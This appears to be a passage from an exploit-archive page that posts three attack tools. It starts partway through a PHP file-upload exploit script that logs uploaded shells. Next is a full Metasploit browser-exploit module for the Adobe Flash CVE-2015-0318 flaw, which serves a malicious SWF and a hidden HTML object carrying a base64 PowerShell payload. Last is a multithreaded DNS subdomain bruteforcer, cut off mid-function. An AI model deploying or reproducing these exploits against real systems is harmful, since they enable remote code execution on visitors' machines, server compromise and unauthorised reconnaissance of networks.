print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL'
: '[-] NOT VULL');
print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty($_x) ? "[+]
{$_s}" . file_put_contents("Exploit_AFU.txt", "{$_s}\n\n", FILE_APPEND) :
'[-] ERROR!');

(105)

18Mar/150

Adobe Flash Player PCRE Regex Logic Error

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  CLASSID =  'd27cdb6e-ae6d-11cf-96b8-444553540000'
 
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Adobe Flash Player PCRE Regex Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
        in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
        a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mark Brand', # Found vuln
          'sinn3r'      # MSF
        ],
      'References'     =>
        [
          [ 'CVE', '2015-0318' ],
          [ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ],
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ]
        ],
      'Payload'        =>
        {
          'Space' => 1024,
          'DisableNops' => true
        },
      'DefaultOptions'  =>
        {
          'Retries' => true
        },
      'Platform'       => 'win',
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :clsid   => "{#{CLASSID}}",
          :method  => "LoadMovie",
          :os_name => OperatingSystems::Match::WINDOWS_7,
          :ua_name => Msf::HttpClients::IE,
          # Ohter versions are vulnerable but .235 is the one that works for me pretty well
          # So we're gonna limit to this one for now. More validation needed in the future.
          :flash   => lambda { |ver| ver == '16.0.0.235' }
        },
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Nov 25 2014",
      'DefaultTarget'  => 0))
  end
 
  def exploit
    # Please see data/exploits/CVE-2015-0318/ for source,
    # that's where the actual exploit is
    @swf = create_swf
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status("Sending SWF...")
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status("Sending HTML...")
    tag = retrieve_tag(cli, request)
    profile = get_profile(tag)
    profile[:tried] = false unless profile.nil? # to allow request the swf
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
    b64_payload = Rex::Text.encode_base64(psh_payload)
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" )
    swf = ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
 
end

(80)

18Mar/150

DNS Spider Multithreaded Bruteforcer 0.6

#!/usr/bin/env python2
# -*- coding: latin-1 -*- ######################################################
#                ____                     _ __                                 #
#     ___  __ __/ / /__ ___ ______ ______(_) /___ __                           #
#    / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /                           #
#   /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /                            #
#                                            /___/ team                        #
#                                                                              #
# dnsspider.py - multithreaded subdomain bruteforcer                           #
#                                                                              #
# DATE                                                                         #
# 08/16/2012                                                                   #
#                                                                              #
# DESCRIPTION                                                                  #
# A very fast multithreaded bruteforcer of subdomains that leverages a         #
# wordlist and/or character permutation.                                       #
#                                                                              #
# AUTHOR                                                                       #
# noptrix - http://www.nullsecurity.net/                                       #
#                                                                              #
# NOTES:                                                                       #
# quick'n'dirty code                                                           #
#                                                                              #
# TODO:                                                                        #
# - attack while mutating -> don't generate whole list when using -t 1         #
#                                                                              #
# CHANGELOG:                                                                   #
# v0.6                                                                         #
# - upgraded default wordlist                                                  #
# - replaced optionparser with argparse                                        #
# - add version output option                                                  #
# - fixed typo                                                                 #
#                                                                              #
# v0.5                                                                         #
# - fixed extracted ip addresses from rrset answers                            #
# - renamed file (removed version string)                                      #
# - removed trailing whitespaces                                               #
# - removed color output                                                       #
# - changed banner                                                             #
#                                                                              #
# v0.4                                                                         #
# - fixed a bug for returned list                                              #
# - added postfix option                                                       #
# - upgraded wordlist[]                                                        #
# - colorised output                                                           #
# - changed error messages                                                     #
#                                                                              #
# v0.3:                                                                        #
# - added verbose/quiet mode - default is quiet now                            #
# - fixed try/catch for domainnames                                            #
# - fixed some tab width (i normally use <= 80 chars per line)                 #
#                                                                              #
# v0.2:                                                                        #
# - append DNS and IP output to found list                                     #
# - added diffound list for subdomains resolved to different addresses         #
# - get right ip address from current used iface to avoid socket problems      #
# - fixed socket exception syntax and output                                   #
# - added usage note for fixed port and multithreaded socket exception         #
#                                                                              #
# v0.1:                                                                        #
# - initial release                                                            #
################################################################################
 
 
import sys
import time
import string
import itertools
import socket
import threading
import re
import argparse
try:
    import dns.message
    import dns.query
except ImportError:
    print("[-] ERROR: you need 'dnspython' package")
    sys.exit()
 
 
BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--'
USAGE = '\n\n' \
        '  dnsspider.py -t <arg> -a <arg> [options]'
VERSION = 'v0.6'
 
defaults = {}
hostnames = []
prefix = ''
postfix = ''
found = []
diffound = []
chars = string.ascii_lowercase
digits = string.digits
 
# default wordlist
wordlist = [
'0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17',
'18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI', 'a',
'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac', 'academico',
'acceso', 'access', 'accounting', 'accounts', 'acid', 'activestat', 'ad',
'adam', 'adkit', 'adm', 'admin', 'administracion', 'administrador',
'administrator', 'administrators', 'admins', 'ads', 'adserver', 'adsl', 'ae',
'af', 'affiliate', 'affiliates', 'afiliados', 'ag', 'agenda', 'agent', 'ai',
'aix', 'ajax', 'ak', 'akamai', 'al', 'alabama', 'alaska', 'albuquerque',
'alerts', 'alpha', 'alterwind', 'am', 'amarillo', 'americas', 'an', 'anaheim',
'analyzer', 'announce', 'announcements', 'antivirus', 'ao', 'ap', 'apache',
'apollo', 'app', 'app01', 'app1', 'apple', 'application', 'applications',
'apps', 'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona',
'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena',
'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto',
'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns', 'b01',
'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup', 'backups',
'baker', 'bakersfield', 'balance', 'balancer', 'baltimore', 'banking',
'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea', 'beta', 'bf', 'bg',
'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj', 'black', 'blackberry',
'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo', 'board', 'bob', 'bof',
'boise', 'bolsa', 'border', 'boston', 'boulder', 'boy', 'br', 'bravo', 'brazil',
'britian', 'broadcast', 'broker', 'bronze', 'brown', 'bs', 'bsd', 'bsd0',
'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla',
'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by',
'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call',
'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd',
'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv',
'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie',
'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi',
'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class',
'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack',
'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm',
'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus',
'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate',
'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference',
'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console',
'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact',
'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01',
'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos',
'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css',
'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer',
'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database',
'database01', 'database02', 'database1', 'database2', 'databases', 'datastore',
'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de',
'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta',
'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des',
'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev',
'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 'developers',
'development', 'device', 'devserver', 'devsql', 'dhcp', 'dial', 'dialup',
'digital', 'dilbert', 'dir', 'direct', 'directory', 'disc', 'discovery',
'discuss', 'discussion', 'discussions', 'disk', 'disney', 'distributer',
'distributers', 'dj', 'dk', 'dm', 'dmail', 'dmz', 'dnews', 'dns', 'dns-2',
'dns0', 'dns1', 'dns2', 'dns3', 'do', 'doc', 'docs', 'document',
'documentacion', 'documentos', 'domain', 'domains', 'dominio', 'domino',
'dominoweb', 'doom', 'download', 'downloads', 'downtown', 'dragon', 'drupal',
'dsl', 'dyn', 'dynamic', 'dynip', 'dz', 'e', 'e-com', 'e-commerce', 'e0',
'eaccess', 'eagle', 'earth', 'east', 'ec', 'echo', 'ecom', 'ecommerce', 'edi',
'edu', 'education', 'edward', 'ee', 'eg', 'eh', 'ejemplo', 'elpaso', 'email',
'employees', 'empresa', 'empresas', 'en', 'enable', 'eng', 'eng01', 'eng1',
'engine', 'engineer', 'engineering', 'enterprise', 'epsilon', 'er', 'erp', 'es',
'esd', 'esm', 'espanol', 'estadisticas', 'esx', 'et', 'eta', 'europe', 'events',
'example', 'examples', 'exchange', 'exec', 'exit', 'ext', 'extern', 'external',
'extranet', 'f', 'f5', 'falcon', 'farm', 'faststats', 'fax', 'feedback',
'feeds', 'fi', 'field', 'file', 'files', 'fileserv', 'fileserver', 'filestore',
'filter', 'finance', 'find', 'finger', 'firewall', 'fix', 'fixes', 'fj', 'fk',
'fl', 'flash', 'florida', 'flow', 'fm', 'fo', 'foobar', 'formacion', 'foro',
'foros', 'fortworth', 'forum', 'forums', 'foto', 'fotos', 'foundry', 'fox',
'foxtrot', 'fr', 'france', 'frank', 'fred', 'freebsd', 'freebsd0', 'freebsd01',
'freebsd02', 'freebsd1', 'freebsd2', 'freeware', 'fresno', 'front', 'frontdesk',
'fs', 'fsp', 'ftp', 'ftp-', 'ftp0', 'ftp2', 'ftpserver', 'fw', 'fw-1', 'fw1',
'fwsm', 'fwsm0', 'fwsm01', 'fwsm1', 'g', 'ga', 'galeria', 'galerias',
'galleries', 'gallery', 'games', 'gamma', 'gandalf', 'gate', 'gatekeeper',
'gateway', 'gauss', 'gd', 'ge', 'gemini', 'general', 'george', 'georgia',
'germany', 'gf', 'gg', 'gh', 'gi', 'git', 'gl', 'glendale', 'gm', 'gmail', 'gn',
'go', 'gold', 'goldmine', 'golf', 'gopher', 'gp', 'gq', 'gr', 'green', 'group',
'groups', 'groupwise', 'gs', 'gsx', 'gt', 'gu', 'guest', 'gw', 'gw1', 'gy', 'h',
'hal', 'halflife', 'hawaii', 'hello', 'help', 'helpdesk', 'helponline', 'henry',
'hermes', 'hi', 'hidden', 'hk', 'hm', 'hn', 'hobbes', 'hollywood', 'home',
'homebase', 'homer', 'honeypot', 'honolulu', 'host', 'host1', 'host3', 'host4',
'host5', 'hotel', 'hotjobs', 'houstin', 'houston', 'howto', 'hp', 'hpc', 'hpov',
'hr', 'ht', 'http', 'https', 'hu', 'hub', 'humanresources', 'i', 'ia', 'ias',
'ibm', 'ibmdb', 'id', 'ida', 'idaho', 'ids', 'ie', 'iis', 'il', 'illinois',
'im', 'image', 'images', 'imail', 'imap', 'imap4', 'img', 'img0', 'img01',
'img02', 'imgs', 'in', 'inbound', 'inc', 'include', 'incoming', 'india',
'indiana', 'indianapolis', 'info', 'informix', 'inside', 'install', 'int',
'interface', 'intern', 'internal', 'international', 'internet', 'intl',
'intranet', 'invalid', 'investor', 'investors', 'io', 'iota', 'iowa', 'ip6',
'iplanet', 'ipmonitor', 'ipsec', 'ipsec-gw', 'ipv6', 'iq', 'ir', 'irc', 'ircd',
'ircserver', 'ireland', 'iris', 'irvine', 'irving', 'is', 'isa', 'isaserv',
'isaserver', 'ism', 'israel', 'isync', 'it', 'italy', 'ix', 'j', 'jabber',
'japan', 'java', 'jboss', 'je', 'jedi', 'jm', 'jo', 'jobs', 'john', 'jp',
'jrun', 'juegos', 'juliet', 'juliette', 'juniper', 'jupiter', 'k', 'kansas',
'kansascity', 'kappa', 'kb', 'ke', 'kentucky', 'kerberos', 'keynote', 'kg',
'kh', 'ki', 'kilo', 'king', 'km', 'kn', 'knowledgebase', 'knoxville', 'koe',
'korea', 'kp', 'kr', 'ks', 'kw', 'ky', 'kz', 'l', 'la', 'lab', 'laboratory',
'labs', 'lambda', 'lan', 'laptop', 'laserjet', 'lasvegas', 'launch', 'lb', 'lc',
'ldap', 'legal', 'leo', 'li', 'lib', 'library', 'lima', 'lincoln', 'link',
'linux', 'linux0', 'linux01', 'linux02', 'linux1', 'linux2', 'lista', 'lists',
'listserv', 'listserver', 'live', 'lk', 'load', 'loadbalancer', 'local',
'localhost', 'log', 'log0', 'log01', 'log02', 'log1', 'log2', 'logfile',
'logfiles', 'logger', 'logging', 'loghost', 'login', 'logs', 'london',
'longbeach', 'losangeles', 'lotus', 'louisiana', 'lr', 'ls', 'lt', 'lu', 'luke',
'lv', 'ly', 'lyris', 'm', 'ma', 'mac', 'mac1', 'mac10', 'mac11', 'mac2', 'mac3',
'mac4', 'mac5', 'mach', 'macintosh', 'madrid', 'mail', 'mail2', 'mailer',
'mailgate', 'mailhost', 'mailing', 'maillist', 'maillists', 'mailroom',
'mailserv', 'mailsite', 'mailsrv', 'main', 'maine', 'maint', 'mall', 'manage',
'management', 'manager', 'managers', 'manufacturing', 'map', 'mapas', 'maps',
'marketing', 'marketplace', 'mars', 'marvin', 'mary', 'maryland',
'massachusetts', 'master', 'max', 'mc', 'mci', 'md', 'mdaemon', 'me', 'media',
'member', 'members', 'memphis', 'mercury', 'merlin', 'messages', 'messenger',
'mg', 'mgmt', 'mh', 'mi', 'miami', 'michigan', 'mickey', 'midwest', 'mike',
'milwaukee', 'minneapolis', 'minnesota', 'mirror', 'mis', 'mississippi',
'missouri', 'mk', 'ml', 'mm', 'mn', 'mngt', 'mo', 'mobile', 'mom', 'monitor',
'monitoring', 'montana', 'moon', 'moscow', 'movies', 'mozart', 'mp', 'mp3',
'mpeg', 'mpg', 'mq', 'mr', 'mrtg', 'ms', 'ms-exchange', 'ms-sql', 'msexchange',
'mssql', 'mssql0', 'mssql01', 'mssql1', 'mt', 'mta', 'mtu', 'mu', 'multimedia',
'music', 'mv', 'mw', 'mx', 'mx01', 'my', 'mysql', 'mysql0', 'mysql01', 'mysql1',
'mz', 'n', 'na', 'name', 'names', 'nameserv', 'nameserver', 'nas', 'nashville',
'nat', 'nc', 'nd', 'nds', 'ne', 'nebraska', 'neptune', 'net', 'netapp',
'netdata', 'netgear', 'netmail', 'netmeeting', 'netscaler', 'netscreen',
'netstats', 'network', 'nevada', 'new', 'newhampshire', 'newjersey',
'newmexico', 'neworleans', 'news', 'newsfeed', 'newsfeeds', 'newsgroups',
'newton', 'newyork', 'newzealand', 'nf', 'ng', 'nh', 'ni', 'nigeria', 'nj',
'nl', 'nm', 'nms', 'nntp', 'no', 'noc', 'node', 'nokia', 'nombres', 'nora',
'north', 'northcarolina', 'northdakota', 'northeast', 'northwest', 'noticias',
'novell', 'november', 'np', 'nr', 'ns', 'ns-', 'ns0', 'ns01', 'ns02', 'ns1',
'ns2', 'ns3', 'ns4', 'ns5', 'nt', 'nt4', 'nt40', 'ntmail', 'ntp', 'ntserver',
'nu', 'null', 'nv', 'ny', 'nz', 'o', 'oakland', 'ocean', 'odin', 'office',
'offices', 'oh', 'ohio', 'ok', 'oklahoma', 'oklahomacity', 'old', 'om', 'omaha',
'omega', 'omicron', 'online', 'ontario', 'op', 'open', 'openbsd', 'openview',
'operations', 'ops', 'ops0', 'ops01', 'ops02', 'ops1', 'ops2', 'opsware', 'or',
'oracle', 'orange', 'order', 'orders', 'oregon', 'orion', 'orlando', 'oscar',
'out', 'outbound', 'outgoing', 'outlook', 'outside', 'ov', 'owa', 'owa01',
'owa02', 'owa1', 'owa2', 'ows', 'oxnard', 'p', 'pa', 'page', 'pager', 'pages',
'paginas', 'papa', 'paris', 'parners', 'partner', 'partners', 'patch',
'patches', 'paul', 'payroll', 'pbx', 'pc', 'pc01', 'pc1', 'pc10', 'pc101',
'pc11', 'pc12', 'pc13', 'pc14', 'pc15', 'pc16', 'pc17', 'pc18', 'pc19', 'pc2',
'pc20', 'pcmail', 'pda', 'pdc', 'pe', 'pegasus', 'pennsylvania', 'peoplesoft',
'personal', 'pf', 'pg', 'pgp', 'ph', 'phi', 'philadelphia', 'phoenix',
'phoeniz', 'phone', 'phones', 'photos', 'phpmyadmin', 'pi', 'pics', 'pictures',
'pink', 'pipex-gw', 'pittsburgh', 'pix', 'pk', 'pki', 'pl', 'plano', 'platinum',
'plesk', 'pluto', 'pm', 'pm1', 'pma', 'pn', 'po', 'policy', 'polls', 'pop',
'pop3', 'portal', 'portals', 'portfolio', 'portland', 'post', 'postales',
'postoffice', 'ppp1', 'ppp10', 'ppp11', 'ppp12', 'ppp13', 'ppp14', 'ppp15',
'ppp16', 'ppp17', 'ppp18', 'ppp19', 'ppp2', 'ppp20', 'ppp21', 'ppp3', 'ppp4',
'ppp5', 'ppp6', 'ppp7', 'ppp8', 'ppp9', 'pptp', 'pr', 'pre', 'prensa', 'press',
'printer', 'printserv', 'printserver', 'priv', 'privacy', 'private',
'problemtracker', 'products', 'profiles', 'project', 'projects', 'promo',
'proxy', 'prueba', 'pruebas', 'ps', 'psi', 'pss', 'pt', 'pub', 'public', 'pubs',
'purple', 'pw', 'py', 'q', 'qa', 'qmail', 'qotd', 'quake', 'quebec', 'queen',
'quotes', 'r', 'r01', 'r02', 'r1', 'r2', 'ra', 'rack', 'radio', 'radius',
'rapidsite', 'raptor', 'ras', 'rc', 'rcs', 'rd', 're', 'read', 'realserver',
'recruiting', 'red', 'redhat', 'ref', 'reference', 'reg', 'register',
'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats',
'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho',
'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose',
'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1',
'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento',
'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego',
'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc',
'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle',
'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri',
'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services',
'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint',
'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si',
'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius',
'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc',
'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort',
'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source',
'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota',
'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk',
'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01',
'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv',
'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1',
'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock',
'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail',
'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1',
'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw',
'sw0', 'sw01', 'sw1', 'sweden', 'switch', 'switzerland', 'sy', 'sybase',
'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't',
'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team',
'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp',
'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k',
'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite',
'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta',
'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn',
'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour',
'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity',
'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u',
'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom',
'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads',
'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users',
'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault',
'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi',
'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual',
'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip',
'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz',
'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse',
'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard',
'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp',
'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring',
'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites',
'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends',
'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi',
'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2',
'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02',
'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate',
'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless',
'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad',
'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4',
'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-',
'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02',
'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x',
'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow',
'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm',
'zulu', 'zw' ]
 
 
def usage():
    print('\n' + USAGE)
    sys.exit()
    return
 
 
def check_usage():
    if len(sys.argv) == 1:
        print('[!] WARNING: use -H for help and usage')
        sys.exit()
    return
 
 
def get_default_nameserver():
    print('[+] getting default nameserver')
    lines = list(open('/etc/resolv.conf', 'r'))
    for line in lines:
        line = string.strip(line)
        if not line or line[0] == ';' or line[0] == '#':
            continue
        fields = string.split(line)
        if len(fields) < 2:
            continue
        if fields[0] == 'nameserver':
            defaults['nameserver'] = fields[1]
            return defaults
 
 
def get_default_source_ip():
    print('[+] getting default ip address')
    try:
        # get current used iface enstablishing temp socket
        ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        ipsocket.connect(("gmail.com", 80))
        defaults['ipaddr'] = ipsocket.getsockname()[0]
        print('[+] found currently used interface ip ' + "'" +
                defaults['ipaddr'] + "'")
        ipsocket.close()
    except:
        print(''' [!] WARNING: can\'t get your ip-address, use "-i" option and
        define yourself''')
    return defaults
 
 
def parse_cmdline():
    p = argparse.ArgumentParser(usage=USAGE, add_help=False)
    p.add_argument(
            '-t',
            metavar='<type>',
            dest='type',
            help='attack type (0 for dictionary 1 for bruteforce)'
            )
    p.add_argument(
            '-a',
            metavar='<domain>',
            dest='domain',
            help='subdomain to bruteforce'
            )
    p.add_argument(
            '-l',
            metavar='<wordlist>',
            dest='wordlist',
            help='wordlist, one hostname per line (default: predefined in code)'
            )
    p.add_argument(
            '-d',
            metavar='<nameserver>',
            dest='dnshost',
            help="choose another nameserver (default: your system's)"
            )
    p.add_argument(
            '-i',
            metavar='<ipaddr>',
            dest='ipaddr',
            help="source ip address to use (default: your system's)"
            )
    p.add_argument(
            '-p',
            metavar='<port>',
            dest='port',
            default=0,
            help='source port to use (default: 0 --> first free random port)'
            )
    p.add_argument(
            '-u',
            metavar='<protocol>',
            dest='protocol',
            default='udp',
            help='speak via udp or tcp (default: udp)'
            )
    p.add_argument(
            '-c',
            metavar='<charset>',
            dest='charset',
            default=0,
            help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)'
            )
    p.add_argument(
            '-m',
            metavar='<maxchar>',
            dest='max',
            default=2,
            help='max chars to bruteforce (default: 2)'
            )
    p.add_argument(
            '-s',
            metavar='<prefix>',
            dest='prefix',
            help="prefix for bruteforce, e.g. 'www'"
            )
    p.add_argument(
            '-g',
            metavar='<postfix>',
            dest='postfix',
            help="postfix for bruteforce, e.g. 'www'"
            )
    p.add_argument(
            '-o',
            metavar='<sec>',
            dest='timeout',
            default=3,
            help='timeout (default: 3)'
            )
    p.add_argument(
            '-v',
            action='store_true',
            dest='verbose',
            help='verbose mode - prints every attempt (default: quiet)'
            )
    p.add_argument(
            '-w',
            metavar='<sec>',
            dest='wait',
            default=0,
            help='seconds to wait for next request (default: 0)'
            )
    p.add_argument(
            '-x',
            metavar='<num>',
            dest='threads',
            default=32,
            help='number of threads to use (default: 32) - choose more :)'
            )
    p.add_argument(
            '-r',
            metavar='<logfile>',
            dest='logfile',
            default='stdout',
            help='write found subdomains to file (default: stdout)'
            )
    p.add_argument(
            '-V',
            action='version',
            version='%(prog)s ' + VERSION,
            help='print version information'
            )
    p.add_argument(
            '-H',
            action='help',
            help='print this help'
            )
    return(p.parse_args())
 
 
def check_cmdline(opts):
    if not opts.type or not opts.domain:
        print('[-] ERROR: mount /dev/brain')
        sys.exit()
    return
 
 
def set_opts(defaults, opts):
    if not opts.dnshost:
        opts.dnshost = defaults['nameserver']
    if not opts.ipaddr:
        opts.ipaddr = defaults['ipaddr']
    if int(opts.charset) == 0:
        opts.charset = chars + digits
    elif int(opts.charset) == 1:
        opts.charset = chars
    else:
        opts.charset = digits
    if not opts.prefix:
        opts.prefix = prefix
    if not opts.postfix:
        opts.postfix = postfix
    return opts
 
 
def read_hostnames(opts):
    print('[+] reading hostnames')
